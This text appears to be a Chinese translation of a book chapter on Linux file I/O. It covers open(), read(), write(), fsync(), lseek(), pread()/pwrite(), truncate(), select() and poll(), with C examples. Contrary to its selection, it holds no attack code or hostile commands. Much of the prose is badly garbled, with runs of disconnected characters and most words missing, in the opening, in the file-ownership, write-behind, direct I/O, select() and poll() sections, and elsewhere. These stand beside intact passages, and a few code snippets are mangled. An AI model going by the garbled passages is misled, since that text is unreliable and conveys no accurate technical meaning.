文件作。
子进程进程的文件。文件、
式文件的。进程文件的 (子进程文
件进程的文件。然将的以
子进程进程的文件(程。
文件 C 的 int 示。 fd t 示
然上实上 Unix 的。 Linux 进程
文件的上。文件 0 上小 1。的上
1,024以将设 1,048,576。的文件以
-1 示能文件的。
进程的文件 0 1 2进程
式的们。文件 0 (stdin文件 1
出(stdout文件 2 (stderr。 C 提处理
STDIN FILENO STDOUT FILENO STDERR FILENO 以对以上
的。
的文件文件的设备
文件、、以及空间、 FIFOs 。文件的理
何能读写的东以文件。
2.1 打开文件
的文件的方 read() write() 调。文件能
open() 或 creat() 调。毕
close() 调文件。
2.1.1 open() 系统调用
open() 调文件文件。
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>

int open (const char *name, int flags);
int open (const char *name, int flags, mode_t mode);
成功时,open() 调用返回一个与 name 所指文件相关联的文件描述符。文件位置被设为零,文件按 flags 给出的标志打开。
2.1.1.1 open() 的 flags 参数
flags 参数必须包含 O_RDONLY、O_WRONLY 或 O_RDWR 三者之一,分别表示以只读、只写或读写模式打开文件。
例如,下面的代码以只读方式打开文件 /home/kidd/madagascar:
int fd;

fd = open ("/home/kidd/madagascar", O_RDONLY);
if (fd == -1)
        /* error */
以写式的文件能读然。进程的能
调 open() 调对文件进。
flags 以以或进或以文件
的。
O_APPEND
文件将以追加模式打开。每次写操作之前,文件位置都会先更新到文件末尾。即使在本进程上一次写之后又有别的进程向该文件写入了数据,情况也是如此。(详见后文“追加模式”一节。)
O_ASYNC
当指定的文件可写或可读时产生一个信号(默认是 SIGIO)。该标志只能用于终端和套接字,不能用于普通文件。
O_CREAT
当 name 指定的文件不存在时,将由内核创建它。如果文件已存在,本标志无效,除非同时给出了 O_EXCL。
O_DIRECT
打开文件用于直接 I/O(详见后文“直接 I/O”一节)。
O_DIRECTORY 如果 name 不是目录,open() 调用将失败。该标志供 opendir() 在内部使用。
O_EXCL
和 O_CREAT 一起给出时,如果 name 指定的文件已存在,则 open() 调用失败。用于防止创建文件时出现竞争。
O_LARGEFILE 打开文件时将使用 64 位偏移量,使得大于 2GB 的文件也能打开。64 位体系结构上打开文件时隐含该标志。
O_NOCTTY
如果给出的 name 指向终端设备(比如 /dev/tty),它不会成为调用进程的控制终端,即使该进程当前没有控制终端。该标志不常用。
O_NOFOLLOW 如果 name 是符号链接,open() 调用将失败。通常情况下会解析符号链接并打开其指向的文件;给出该标志后,路径中间的符号链接仍可解析,但最后一项不允许是符号链接。例如,若 name 是 /etc/ship/plank.txt,则当 plank.txt 是符号链接时调用失败;然而若 etc 或 ship 是符号链接而 plank.txt 不是,调用会成功。
O_NONBLOCK 如果可以,文件将以非阻塞模式打开。open() 调用和后续所有操作都不会使进程在 I/O 中阻塞 (sleep)。这种情况只对 FIFO 有定义。
O_SYNC
打开文件用于同步 I/O。在数据写到磁盘之前写操作不会完成;普通的读操作本来就是同步的,所以该标志对读操作不起作用。POSIX 还定义了 O_DSYNC 和 O_RSYNC,在 Linux 上它们与 O_SYNC 同义。(详见后文“O_SYNC 标志”一节。)
O_TRUNC
如果文件存在,且为普通文件,并且允许写,则将文件长度截断为 0。对 FIFO 或终端设备该标志被忽略;在其他文件类型上行为未定义。由于截断文件需要写权限,O_TRUNC 与 O_RDONLY 同时指定的行为也是未定义的。∗
int fd;

fd = open ("/home/teach/pearl", O_WRONLY | O_TRUNC);
if (fd == -1)
        /* error */
2.1.2 新文件所有者
新文件单的文件的 id
文件的进程的效 id。。将文
件的进程的 id 文件。 System V 的(Linux 以
System V Linux 的处理方。
然的 BSD 自的: 文件的上的
id。 Linux 上实∗文件上设
设 ID (setgid) Linux 的将。 Linux
V 的(新文件进程的 ID BSD (新文件
上 id真的 chown() 调
设。
文件的。
2.1.3 新文件权限
mode 参数在 open() 以 O_CREAT 标志创建新文件时给出新文件的权限。只有给出了 O_CREAT,mode 才有意义;创建新文件时必须提供 mode,如果给出了 O_CREAT 却缺少 mode,结果是未定义的。
∗ O TRUNC | O RDONLY 的 Linux (2.6 内 +GCC4.2)将同
O TRUNC。
∗对 bsdgroups 或 sysvgroups。
创建文件时,mode 提供新文件的权限。权限位不影响本次打开本身,因此可以创建一个自己都不可读的文件,却照样对返回的描述符进行写操作。
mode 参数是常见的 Unix 权限位集合,比如八进制数 0644(属主可以读写,其他人只能读)。从技术上讲,POSIX 允许具体实现自行决定各权限位的含义,不同的 Unix 系统可以自己设定。为弥补这种不可移植性,POSIX 引入了下面一组可以按位或起来使用的常量,以满足对 mode 参数的需要:
S_IRWXU 属主有读、写和执行权限。
S_IRUSR 属主有读权限。
S_IWUSR 属主有写权限。
S_IXUSR 属主有执行权限。
S_IRWXG 属组有读、写和执行权限。
S_IRGRP 属组有读权限。
S_IWGRP 属组有写权限。
S_IXGRP 属组有执行权限。
S_IRWXO 其他任何人都有读、写和执行权限。
S_IROTH 其他任何人都有读权限。
S_IWOTH 其他任何人都有写权限。
S_IXOTH 其他任何人都有执行权限。
实际上,写入磁盘的权限位是由 mode 参数和用户的文件创建掩码 (umask) 共同决定的:内核会在 open() 给出的 mode 中去掉 umask 所含的位。如果用户的 umask 是 022,mode 参数 0666 实际会变成 0644(0666 & ~022)。系统程序员设置权限时通常不考虑 umask——umask 存在的意义,就是让用户能限制其程序创建新文件时赋予的权限。
举个例子:假设要新建文件 file 并对其进行写操作。假定该文件不存在,且 umask 为 022,下面的代码将创建权限为 0644 的文件(即使 mode 参数指定的是 0664);若文件已存在,则将其长度截断为 0:
int fd;
fd = open (file, O_WRONLY | O_CREAT | O_TRUNC,
           S_IWUSR | S_IRUSR | S_IWGRP | S_IRGRP | S_IROTH);
if (fd == -1)
        /* error */
2.1.4 creat() 函数
O WRONLY | O CREAT | O TRUNC 以
调实。
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
int creat (const char *name, mode_t mode);
的的 e。 Ken Thompson Unix 的
设 Unix 的。
的 creat() 调
int fd;
fd = creat (file, 0644);
if (fd == -1)
/* error */
int fd;

fd = open (file, O_WRONLY | O_CREAT | O_TRUNC, 0644);
if (fd == -1)
        /* error */
尽管 creat() 完全可以像上面那样在用户空间里等价实现,它在很多 Linux 体系结构上仍是一个独立的系统调用∗:
int creat (const char *name, int mode)
{
        return open (name, O_WRONLY | O_CREAT | O_TRUNC, mode);
}
这是历史遗留的结果:早期的 open() 参数较少,才有了 creat()。如今 creat() 出于向后兼容而保留;在较新的体系结构上,它往往直接由 glibc 按上面的方式用 open() 实现。
2.1.5 返回值和错误码
open() creat() 调时文件。时 -1
将 errno 设的( errno出能的
。处理文件的的文件操作
处理, 的方式提示文件或程。
2.2 用 read() 读取文件
何文件我们何读。的
我们将写操作。
、的读文件的 read() 调。调
POSIX.1
#include <unistd.h>
ssize_t read (int fd, void *buf, size_t len);
调 fd 的文件的读 len buf 。
时将写 buf 的。出时 -1设 errno。 fd 文
∗调上的。 i386 creat() 调
Alpha 。以上 creat()然能调
。
件将的读的。
文件(设备文件文件读操作
。
用法很简单。下面的例子从 fd 所指的文件中读取数据保存到 word 中,读取的字节数与 unsigned long 的大小相同,在 32 位 Linux 上是 4 字节,64 位上是 8 字节。返回时,nr 保存实际读到的字节数;出错时 nr 为 -1:
unsigned long word;
ssize_t nr;
/* read a couple bytes into ’word’ from ’fd’ */
nr = read (fd, &word, sizeof (unsigned long));
if (nr == -1)
/* error */
这个简单实现有两个问题:调用可能没读满 len 个字节就返回,这种情况没有被处理;另外有些可能出现的错误也没有被检查。很遗憾,类似这样的代码非常常见。我们来看看如何改进它。
2.2.1 返回值
len 小的零对 read() 的。出
能的原读的 len
调能能( fd 。
的调 read() 时 0 的。文件时
read() 调 0, 文件 (EOF)然
读。 EOF ( -1示文件
文件效何读。然
调读 len 读调将(
以读(设文件式
读。 EOF 时同。
读同的。 EOF 的文件。的
读操作更的或设备文件读的时
。
以的。 read() 调读何
-1( 0能 EOF 设 errno
EINTR。以新提读。
对 read() 的调实能的
• 调 len 的。 len 读存 buf 。
。
• 调零小 len 的。读的存 buf 。
出读程或读效
零 len 时或读 len EOF。进读
(更新 buf len 的将读 buf 的空间或出
的原。
• 调 0。 EOF。以读的。
• 调的读的。式
。
• 调 -1 errno 设 EINTR。示读
。以新进调。
• 调 -1 errno 设 EAGAIN。示读的
读。式。
• 调 -1 errno 设同 EINTR 或 EAGAIN 的。示
更的。
2.2.2 读入所有的字节
处 理 的 读 len ( 读
EOF单的 read() 的。的
件。
ssize_t ret;

while (len != 0 && (ret = read (fd, buf, len)) != 0) {
        if (ret == -1) {
                if (errno == EINTR)
                        continue;
                perror ("read");
                break;
        }

        len -= ret;
        buf += ret;
}
段处理。 fd 的文件读 len
buf 读读 len 或 EOF 。读
零 len len 读 buf 相的
新调 read()。调 -1 errno EINTR将新
调更新。调 -1 errno 设将调 perror()
。
读的的。 bug 程
处理读的。
2.2.3 非阻塞读
时程读时 read() 调。相们
读时调即。 I/O
的进 I/O 操作操作文件时
文件的。
这种情况有一个专门的错误码:EAGAIN。如果文件描述符以非阻塞模式打开(open() 的 flags 参数给出了 O_NONBLOCK;见“open() 的 flags 参数”一节),而当前没有数据可读,read() 调用会返回 -1 并把 errno 设为 EAGAIN,而不是阻塞。进行非阻塞 I/O 时必须检查 EAGAIN,否则可能把“暂时没有数据”误当作严重错误处理,造成数据丢失。可以使用如下代码:
char buf[BUFSIZ];
ssize_t nr;

start:
nr = read (fd, buf, BUFSIZ);
if (nr == -1) {
        if (errno == EINTR)
                goto start; /* oh shush */
        if (errno == EAGAIN)
                /* resubmit later */
        else
                /* error */
}
处理 EAGAIN 时 goto start 能实上
— I/O 即。能
时间相更的的。
2.2.4 其他错误码
其他错误码大多表示编程错误,或者(像 EIO 那样)表示底层问题。read() 失败时可能出现的 errno 值包括:

EBADF 给出的文件描述符无效,或不是以可读方式打开的。
EFAULT buf 指针不在调用进程的地址空间内。
EINVAL 文件描述符所对应的对象不允许读。
EIO 发生了底层 I/O 错误。
2.2.5 read() 大小限制
size_t 和 ssize_t 都是 POSIX 定义的类型。size_t 用来存储以字节计的大小,是无符号的;ssize_t 是 size_t 的有符号版本(负值用来表示错误)。在 32 位系统上,它们对应的 C 类型分别是 unsigned int 和 int。由于两者配对使用,ssize_t 较小的取值范围实际上也限制了 size_t 的可用范围。
size_t 的最大值是 SIZE_MAX,ssize_t 的最大值是 SSIZE_MAX。如果 len 大于 SSIZE_MAX,read() 调用的结果是未定义的。Linux 上 SSIZE_MAX 是 LONG_MAX,在 32 位系统上即 0x7fffffff。这个值对一次读操作来说已经相当大,但仍需留意。若把上面的读循环作为通用的读取方式使用,可以加上:
if (len > SSIZE_MAX)
len = SSIZE_MAX;
len 为零时,read() 调用立即返回,返回值为 0。
2.3 用 write() 来写
最基本、最常用的写文件的系统调用是 write()。write() 与 read() 相对应,同样由 POSIX.1 定义:
#include <unistd.h>

ssize_t write (int fd, const void *buf, size_t count);
write() 调文件 fd 文件的将 buf
count 写文件。的文件(设备
写。
时写更新文件。时 -1将 errno
设相的。 write() 以 0何
示写零。
一个和 read() 类似的简单例子:

const char *buf = "My ship is solid!";
ssize_t nr;

/* write the string in 'buf' to 'fd' */
nr = write (fd, buf, strlen (buf));
if (nr == -1)
        /* error */
/* error */
和 read() 一样,上面的用法并不完全正确:调用者还需要检查是否出现了“部分写”的情况,而不能只检查出错返回:

unsigned long word = 1720;
size_t count;
ssize_t nr;

count = sizeof (word);
nr = write (fd, &word, count);
if (nr == -1)
        /* error, check errno */
else if (nr != count)
        /* possible error, but 'errno' not set */
2.3.1 部分写
相对 read() 的读的 write() 能写的
。对 write() 调 EOF 。对文件
write() 将写的。
对 文 件 进 写 。然 对
真的写的
。的处 write() 调能
调进写(。
的示
ssize_t ret, nr;

while (len != 0 && (ret = write (fd, buf, len)) != 0) {
        if (ret == -1) {
                if (errno == EINTR)
                        continue;
                perror ("write");
                break;
        }

        len -= ret;
        buf += ret;
}
2.3.2 追加模式
当 fd 以追加模式打开时(指定了 O_APPEND 标志),写操作就与当前文件位置无关,数据总是被追加到文件末尾。
设进程同文件写。式的
进程文件写进程进程的文件
将文件将文件进程写的的
方。进程进式的同步能进写操作
们存件。
式的。文件文件
的写操作的即写。以写的文件
更新操作原子操作。文件更新写的。
write() 调更新文件自的能的原
read() 调。
式更新文件方
处。
2.3.3 非阻塞写
当 fd 以非阻塞模式打开时(设置了 O_NONBLOCK 标志),如果写操作会阻塞,write() 调用返回 -1,并把 errno 设为 EAGAIN,请求应当稍后重新发起。处理普通文件时一般不会出现这种情况。
2.3.4 其他错误码
write() 失败时可能出现的错误码有:

EBADF 给出的文件描述符无效,或不是以可写方式打开的。
EFAULT buf 指针不在进程地址空间内。
EFBIG 写操作将使文件大小超过进程的最大文件限制,或内部实现的限制。
EINVAL 给出的文件描述符所对应的对象不能进行写操作。
EIO 发生了底层 I/O 错误。
ENOSPC 文件描述符所在的文件系统没有足够空间。
EPIPE 给出的文件描述符与一个管道或套接字相关联,而其读取端已经关闭。此外进程
还会收到 SIGPIPE 信号。SIGPIPE 信号的默认行为是终止接收它的进程,因此只有在显式地忽略、阻塞或处理该信号时,才会收到这个错误码。
2.3.5 write() 大小限制
如果 count 大于 SSIZE_MAX,write() 调用的结果是未定义的。count 为零的 write() 调用将立即返回,返回值为 0。
2.3.6 write() 的行为
write() 调时内将提的内
写的文件。 write 调对的
实。处理的异。
空间 write() 调时 Linux 内进然
将。内集的”
将们写上(程写。 write 调
上调。内以将写操作空段将写操
作处理。
写 POSIX 的。 read 调
读写写的将
读上的。实上提效率 read
内存存读。读写
然提写
即对程写操作写
。
写的对写的能性。
能的写以们将写出性能方的
内将的新。时
将写。绝的实上写
。
写的 I/O 的。何写出的
I/O 方理给写的
进程。实上进程的。进程能更新同
的进程能写出。
能写操作的进程
内将写的小。时写内
存时效将的存们超给时效写。
以 /proc/sys/vm/dirty expire centiseconds 。以
(。
文件存写以的以将的写操作同步。将
的同步 I/O。
内内将 Linux 内的写子。
2.4 同步 I/O
同步 I/O 的写相的。
写提的性能进以子的
实写。然写的时间。对
Linux 内提性能同步操作。
2.4.1 fsync() 和 fdatasync()
单的写的方 fsync() 调 POSIX.1b
#include <unistd.h>
int fsync (int fd);
调 fsync() 以 fd 对文件的写上。文件 fd
以写方式的。调写以及的时间 inode 的属性
。写。
将写存时 fsync() 能上
。能写能的存上。
的存的将写。
Linux 提 fdatasync() 调
#include <unistd.h>
int fdatasync (int fd);
调的 fsync() , 写。调
同步上能。。
相同的单
int ret;
ret = fsync (fd);
if (ret == -1)
/* error */
调何更新的文件的同步
上。文件更文件能写
相的上文件。何对的更
新同步上对调 fsync() 进同步。
2.4.2 返回值和错误码
时调 0。时 -1将 errno 设以
EBADF
给的文件以写的。
EINVAL 给的文件对的对同步。
EIO
同步时 I/O 。示真的 I/O
处。
即相文件上实 fdatasync() 实 fsync(), 调
fsync() 时。的能 fsync() EINVAL 时
fdatasync()示
if (fsync (fd) == -1) {
        /*
         * We prefer fsync(), but let's try fdatasync()
         * if fsync() fails, just in case.
         */
        if (errno == EINVAL) {
                if (fdatasync (fd) == -1)
                        perror ("fdatasync");
        } else
                perror ("fsync");
}
POSIX fsync() 的 fdatasync() 的 fsync()
的、文件的 Linux 文件实。然文件
(能同步的文件或的文件或
实 fdatasync()。
2.4.3 sync()
sync() 调以对上的进同步, 效率
然
#include <unistd.h>
void sync (void);
。的
能写。∗
sync() 写
调将将写的程即。同步
以的的写。然对 Linux sync()
的写。调 sync() 。
sync() 真上的方工 sync 的实。程 fsync()
fdatasync() 将文件的同步。的能
的上 sync() 操作能的时间。
∗以, 以能, 内写
上实上们存。
2.4.4 O SYNC 标志
O_SYNC 标志可以在 open() 时指定,表示该文件上的所有 I/O 操作都同步进行。
int fd;
fd = open (file, O_WRONLY | O_SYNC);
if (fd == -1) {
perror (”open”);
return -1;
}
读同步的。同步将读的效
性。然的 write() 调同步的。调
写间。 O SYNC 将
write() 调进 I/O 同步。
可以认为,O_SYNC 使得每次 write() 操作之后都隐式地执行一次 fsync()。
上的 Linux 内实的 O SYNC 更效。
O SYNC 将写操作及内时间(内空
间的时间。写文件的小能的时间进
程的 I/O 时间 ( I/O 的时间) 上时的 O SYNC 时
。时间的以同步 I/O
的。
写的以 fsync() 或 fdata-
sync()。的调(性的操作相对
O SYNC 更。
2.4.5 O DSYNC 和 O RSYNC
POSIX open() 同 步 相 的 O DSYNC
O RSYNC。 Linux 上 O SYNC 同们相同的。
O DSYNC 写操作同步同
步。写式调 fdatasync() 。 O SYNC 提
更的以 O DSYNC 时能
O SYNC 更的性能。
O RSYNC 读写进同步。能
O SYNC 或 O DSYNC 。文读操作同步的
给的时。 O RSYNC 何读操作的作
同步的。读操作更新调写
。实 read() 调文件时间更
新上的 inode 。 Linux 将 O RSYNC 设
O SYNC ( O SYNC O DSYNC 的同。 Linux
O RSYNC 的对的方式 read() 调调
fdatasync()。实上操作。
2.5 直接 I/O
操作内 Linux 内实的存、
以及设备间的 I/O 理的(内内。
性能能的进的 I/O 理。 I/O
实实上操作的工工
更的性能。然们自的存以能的
操作的。
open() O DIRECT 内小 I/O 理的。
时 I/O 操作将页存对空间设备进
。的 I/O 将同步的操作。
I/O 时对文件设备
小 ( 512 ) 的。 2.6 内更 2.4
的东对文件小( 4KB。性
对更的(更的小。
2.6 关闭文件
程对文件的操作以 close() 调将文件
对的文件。
#include <unistd.h>
int close (int fd);
close() 调的文件的离进程文件的
。给的文件效内以将作的 open() 或 creat()
调的新。 close() 调时 0。时 -1设
errno 相。单
if (close (fd) == -1)
        perror ("close");
的文件文件写。
文件写同步 I/O的同步。
然文件的作。文件的文件
内示文件的。时文件的
inode 的内存。 inode 能内存
(能内存内效率存 inode能
。文件上
inode 内存真的。对 close() 的调能
的文件上。
2.6.1 错误码
的 close() 的。处理能
的。操作的原能出 close()
。
以出时能出的 errno 。 EBADF(给的文件
的 EIO能实的 close
操作相的 I/O 。出的文件的
的的。
POSIX close() 绝 EINTR。 Linux 内们能
的实。
2.7 用 lseek() 查找
的文件的 I/O 性的读写的文件的式更新
的。然文件。 lseek()
调能对给文件的文件设。更新文件
的何何 I/O。
#include <sys/types.h>
#include <unistd.h>
off_t lseek (int fd, off_t pos, int origin);
lseek() 的行为依赖于 origin 参数,它可以是以下值之一:
SEEK_CUR  当前文件位置加上 pos,pos 可以为负值、零或正值。pos 为零时,返回当前文件位置。
SEEK_END  文件位置设为当前文件末尾加上 pos,pos 可以为负值、零或正值。pos 为零时,位置设在文件末尾。
SEEK_SET  文件位置直接设为 pos。pos 为零时,位置设在文件起始处。
调用成功时返回新的文件位置;出错时返回 -1,并相应设置 errno。
设文件 fd 1825
off_t ret;
ret = lseek (fd, (off_t) 1825, SEEK_SET);
if (ret == (off_t) -1)
/* error */
或设文件 fd 文件
off_t ret;
ret = lseek (fd, 0, SEEK_END);
if (ret == (off_t) -1)
/* error */
lseek() 更新的文件以 SEEK CUR 零文件
int pos;
pos = lseek (fd, 0, SEEK_CUR);
if (pos == (off_t) -1)
/* error */
else
/* ’pos’ is the current position of fd */
然 lseek() 的文件的或
文件的文件。
2.7.1 文件末尾之后进行查找
lseek() 以文件超文件进的。
的将 fd 对的文件 1688 。
int ret;
ret = lseek (fd, (off_t) 1688, SEEK_END);
if (ret == (off_t) -1)
/* error */
对文件文件
的读 EOF。然对写新
间新的空间零。
零方式空(hole。 Unix 的文件上空
何理上的空间。示文件上文件的小
以超的理小。空的文件文件(sparse file。文
件以的空间提效率操作空何理 I/O。
对文件空的读将相的进零。
2.7.2 错误码
出错时,lseek() 返回 -1,并将 errno 设置为以下值之一:
EBADF     给出的文件描述符没有关联任何打开的文件。
EINVAL    origin 参数不是 SEEK_SET、SEEK_CUR 或 SEEK_END 之一,或者计算出的目标文件位置为负值。两种错误共用 EINVAL 有些遗憾:前者几乎肯定是编程错误,而后者可能只是运行时才能发现的合理失败。
EOVERFLOW 计算出的文件位置无法用 off_t 表示。这只会发生在 32 位体系结构上。此时文件位置的移动本身已经完成,只是无法返回结果。
ESPIPE    给出的文件描述符关联在不支持定位操作的对象上,例如管道、FIFO 或套接字。
2.7.3 限制
文件的上 off t 的小。 C
的 long Linux 上(存的小。内实
内将存 C 的 long long 。处理方 64 上
32 上作相时能 EOVERFLOW 。
2.8 定位读写
Linux 提 read() write() 的 lseek()调以
读写的文件。时文件。
读式的调 pread()
#define _XOPEN_SOURCE 500
#include <unistd.h>
ssize_t pread (int fd, void *buf, size_t count,
off_t pos);
这个调用从文件描述符 fd 的 pos 位置处开始,读取 count 个字节到 buf 中,不改变当前文件位置。
写式的调 pwrite()
#define _XOPEN_SOURCE 500
#include <unistd.h>
ssize_t pwrite (int fd, const void *buf, size_t
count, off_t pos);
这个调用从文件描述符 fd 的 pos 位置处开始,把 buf 中的 count 个字节写入文件,不改变当前文件位置。
们文件调的 read()、 wirte()
们 pos 提的。调时们
文件。何的 read() write() 调能读写的
。
读写调能以进操作的文件。
相调 read() 或 write() lseek() 进
: 调更单文件
性的操作时更。, 操作时文件。
的何 lseek() 时能出的。
程文件能程调 lseek() 进读写操作
程文件。我们以 pread() pwrite()
的。
2.8.1 错误码
时调读或写的。 pread() 零示 EOF对
pwrite()零调写何东。出时 -1 设
errno 相。对 pread() 何对 read() 或 lseek() 的 errno 能
出的。对 pwrite() 何 write() 或 lseek() 的 errno 能出的。
2.9 截短文件
Linux 提调文件 POSIX
(同程的实。们
#include <unistd.h>
#include <sys/types.h>
int ftruncate (int fd, off_t len);
#include <unistd.h>
#include <sys/types.h>
int truncate (const char *path, off_t len);
调将文件 len 的。 ftruncate() 调操作
的写的文件 fd。 truncate() 调操作 path 的
写文件。时 0。时 -1设 errno 相。
调的将文件原文件小。
时文件 len。 len 间的将
读。
们以将文件原更文件
上写操作的。扩展出的将零。
操作文件。
内的 74 小的文件 pirate.txt
Edward Teach was a notorious English pirate.
He was nicknamed Blackbeard.
同的程:
#include <unistd.h>
#include <stdio.h>
int main( )
{
int ret;
ret = truncate ("./pirate.txt", 45);
if (ret == -1) {
perror ("truncate");
return -1;
}
return 0;
}
45 的文件
Edward Teach was a notorious English pirate.
2.10 I/O 多路复用
程 文 件 上
(stdin、进程间以及同时操作文件。件的
(GUI的能上的件。∗
程处理文件的进程文
件上同时。文件处备读写的同时操作文
件的。程出备的文件
( read() 调读)进程将
能操作文件。能的
。然文件何能
。文件的 I/O 相的 ()能文件
文件以处。
对程同时的的。
: 设备出进程
间相的文件上。的 IPC 文件
能。的操作
I/O 以作的方。
I/O以 I/O 的。方
∗对何写 GUI 的的 GNOME GLib的
提的。件。
方效率。进程以的方式 I/O
操作的文件备进 I/O。设。
程以的将更效以处理进工作或更
文件以进 I/O 时。
进 I/O 。
I/O 文件上同时以读
写时。时 I/O 的 I/O
的设以原
1. I/O 何文件备 I/O 时我
2. 或更文件处。
3. 备
4. 的处理 I/O 的文件。
5. 步新。
Linux 提 I/O 方 select poll epoll。我们
我们将 Linux 的方。
2.10.1 select()
select() 调提实同步 I/O 的
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
int select (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
struct timeval *timeout);
FD_CLR(int fd, fd_set *set);
FD_ISSET(int fd, fd_set *set);
FD_SET(int fd, fd_set *set);
FD_ZERO(fd_set *set);
的文件备 I/O 或超的时间 select() 调
。
的文件以同的件。 readfds 集
的文件读(读操作以的
。 writefds 集的文件写操作以
。 exceptefds 的文件出异或
出 (out-of-band) (。的集能
空 (NULL)相的 select() 对时间进。
时集对的 I/O 的文件。
readfds 集文件 7 9。调时 7 集
文件备进 I/O 。 9 集能
读时。(我能能调
。 select() 调时将文件
的。∗
n集文件的。 select()
的调的文件将给。
timeout timeval 的
#include <sys/time.h>
struct timeval {
long tv_sec; /* seconds */
long tv_usec; /* microseconds */
};
NULL即时文件处 I/O
select() 调将 tv sec tv usec 。时的
Unix 的。的调新
(集的文件。新的 Linux 自将的时
间。时 5 文件备时 3 tv.tv sec
时 2。
∗ select() poll() 的。将的 epoll()
以方式工作。操作单时 I/O 件。
时的零调即调时件对
的文件何件。
这些集合中的文件描述符不能直接操作,而要通过辅助宏来管理。这也让 Unix 系统可以按自己认为合适的方式来实现集合。FD_ZERO 把指定集合中的所有文件描述符都移除,每次调用 select() 之前都应当先使用它:
fd_set writefds;
FD_ZERO(&writefds);
FD_SET 向指定集合中添加一个文件描述符,FD_CLR 则从指定集合中移除一个文件描述符:
FD_SET(fd, &writefds); /* add 'fd' to the set */
FD_CLR(fd, &writefds); /* oops, remove 'fd' from the set */
设计良好的代码应该永远不需要使用 FD_CLR,实际中它也很少被用到。
FD_ISSET 测试某个文件描述符是否在给定集合中;若在,返回非零整数,否则返回 0。select() 调用返回之后,用 FD_ISSET 来检查文件描述符是否已经就绪:
if (FD_ISSET(fd, &readfds))
/* 'fd' is readable without blocking! */
由于文件描述符集合是静态分配的,它对文件描述符的数目设置了上限:FD_SETSIZE。在 Linux 上,这个值是 1024。本章稍后我们还会讨论这个限制带来的影响。
2.10.2 返回值和错误码
成功时,select() 返回所有集合中发生 I/O 的文件描述符的总数。如果给出了超时时间,返回值可能是 0。出错时返回 -1,并把 errno 设置为以下值之一:
EBADF   某个集合中存在非法的文件描述符。
EINTR   等待时捕获了一个信号,可以重新发起调用。
EINVAL  参数 n 为负值,或者给出的超时时间非法。
ENOMEM  没有足够的内存来完成请求。
2.10.2.1 select() 示例程序
我们的程然单对 select() 的
。子 stdin 的的时设 5 。
文件实上 I/O 调的。
#include <stdio.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#define TIMEOUT 5 /* select timeout in seconds */
#define BUF_LEN 1024 /* read buffer in bytes */
int main (void)
{
struct timeval tv;
fd_set readfds;
int ret;
/* Wait on stdin for input. */
FD_ZERO(&readfds);
FD_SET(STDIN_FILENO, &readfds);
/* Wait up to five seconds. */
tv.tv_sec = TIMEOUT;
tv.tv_usec = 0;
/* All right, now block! */
ret = select (STDIN_FILENO + 1,
              &readfds,
              NULL,
              NULL,
              &tv);
if (ret == -1) {
        perror ("select");
        return 1;
} else if (!ret) {
        printf ("%d seconds elapsed.\n", TIMEOUT);
        return 0;
}

/*
 * Is our file descriptor ready to read?
 * (It must be, as it was the only fd that
 * we provided and the call returned
 * nonzero, but we will humor ourselves.)
 */
if (FD_ISSET(STDIN_FILENO, &readfds)) {
        char buf[BUF_LEN+1];
        int len;

        /* guaranteed to not block */
        len = read (STDIN_FILENO, buf, BUF_LEN);
        if (len == -1) {
                perror ("read");
                return 1;
        }

        if (len) {
                buf[len] = '\0';
                printf ("read: %s\n", buf);
        }

        return 0;
}

fprintf (stderr, "This should not happen!\n");
return 1;
}
2.10.2.2 用 select() 实现可移植的 sleep()
select() Unix 实相对的
将 select() 的的。方将
集设空 (NULL), 将超时设空 (non-NULL) 实。
struct timeval tv;
tv.tv_sec = 0;
tv.tv_usec = 500;
/* sleep for 500 microseconds */
select (0, NULL, NULL, NULL, &tv);
然 Linux 提的的实内我们将
。
2.10.2.3 pselect()
4.2BSD 的 select() POSIX 自的方
pselect() POSIX 1003.1g-2000 的 POSIX 1003.1-2001 对 pselect()
#define _XOPEN_SOURCE 600
#include <sys/select.h>
int pselect (int n,
fd_set *readfds,
fd_set *writefds,
fd_set *exceptfds,
const struct timespec *timeout,
const sigset_t *sigmask);
FD_CLR(int fd, fd_set *set);
FD_ISSET(int fd, fd_set *set);
FD_SET(int fd, fd_set *set);
FD_ZERO(fd_set *set);
pselect() select() 同
1. pselect() 的 timeout timespec timeval 。 time-
spec 理上更。实上
上。
2. pselect() 调 timeout 。调时
新。
3. select() 调 sigmask 。设零时 pselect() 的
同 select()。
timespec 式
#include <sys/time.h>
struct timespec {
long tv_sec; /* seconds */
long tv_nsec; /* nanoseconds */
};
pselect() Unix 工的原 sigmask 以
文件间的件(。设
处理程设(处理程进程
调 select() 。调间
能。 pselect() 提的
以。的处理。 pselect()
内的。。
2.6.16 内 Linux 实的 pselect() 调 glibc
提的单的对 select() 的。方件出的小
。真调。
pselect() (相对的进 se-
lect()出性。
2.10.3 poll()
poll() 调 System V 的 I/O 方。 select()
的 select() (出性的
#include <sys/poll.h>
int poll (struct pollfd *fds, unsigned int nfds,
int timeout);
select() 的的文件集同 poll()
单的 nfds pollfd 的 fds 。
#include <sys/poll.h>
struct pollfd {
int fd; /* file descriptor */
short events; /* requested events to watch */
short revents; /* returned events witnessed */
};
pollfd 单的文件。以,
poll() 文件。的 events 段的文件
件的。设段。 revents 段文件上
的件的。内时设段。 events 段的件
能 revents 段。的件
POLLIN      有数据可读。
POLLRDNORM  有普通数据可读。
POLLRDBAND  有优先数据可读。
POLLPRI     有高优先级数据急需读取。
POLLOUT     写操作不会阻塞。
POLLWRNORM  写普通数据不会阻塞。
POLLWRBAND  写优先数据不会阻塞。
POLLMSG     有一条 SIGPOLL 消息可用。
此外,以下事件可能在 revents 中返回:
POLLERR   给出的文件描述符上发生错误。
POLLHUP   文件描述符上发生挂起事件。
POLLNVAL  给出的文件描述符非法。
这些事件不需要在 events 字段中指定,在相应情况下它们总会被返回。这一点与 select() 不同:poll() 能准确地告诉你发生了什么,而不需要显式地监听异常情况。
POLLIN | POLLPRI 相当于 select() 的读事件,POLLOUT | POLLWRBAND 相当于 select() 的写事件。POLLIN 等价于 POLLRDNORM | POLLRDBAND,POLLOUT 等价于 POLLWRNORM。
文件读写我们设 events POLLIN
| POLLOUT。 时我 们 将 revents 相 的 。 设
POLLIN文件能读。设 POLLOUT文件
能写。相以设示以文
件上读写。
timeout 何 I/O 时间的以。
示。零示调即出备的 I/O
何件。 poll() 同即。
2.10.3.1 返回值和错误码
